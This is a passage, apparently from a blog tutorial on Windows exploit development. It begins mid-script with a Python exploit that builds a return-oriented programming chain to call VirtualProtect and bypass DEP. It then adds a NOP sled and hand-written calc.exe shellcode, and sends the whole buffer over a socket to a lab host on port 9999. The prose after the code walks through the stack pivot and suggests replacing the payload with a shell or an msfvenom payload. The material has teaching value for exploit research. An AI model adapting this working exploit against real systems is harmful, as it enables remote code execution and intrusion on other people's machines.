rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Now we need to return to where the VirutalProtect call is on the stack.
# ECX contains a value around the old stack pointer at this time (from the beginning). Put ECX into EAX
# and decrement EAX to get back to the function call- and then load EAX into ESP.
# Restoring the old stack pointer here.
rop2 += struct.pack ('<L', 0x77e4a5e6)   # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41ac863b)   # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41ac863b)  # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77d6fa6a)   # 0x77d6fa6a: xchg eax, esp ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

ECX is moved into EAX:

EAX is then decremented by four bytes, to equal where the call to VirtualProtect() occurs on the stack:

EAX is then exchanged with ESP (EAX and ESP swap spaces):

As you can see, ESP points to the function call- and the ret loads that function call into the instruction pointer to kick off execution!:

As you can see, our calc.exe payload has been executed- and DEP has been defeated (the PowerShell windows shows the DEP policy. Open the image in a new tab to view it better)!!!!!:

You could replace the calc.exe payload with something like a shell- sure! This was just a POC payload, and there is something about shellcoding by hand, too that I love! ROP is so manual and requires living off the land, so I wanted a shellcode that reflected that same philosophy.

Final Thoughts

Please email me if you have any further questions! I can try to answer them as best I can. As I continue to start getting into more and more modern day exploit mitigation bypasses, I hope I can document some more of my discoveries and advances in exploit development.

Peace, love, and positivity :-)

ROP is different everytime. There is no one way to do it. However, I did learn a lot from this article, and referenced it. Thank you, Peter! :) You are a beast!

❌
❌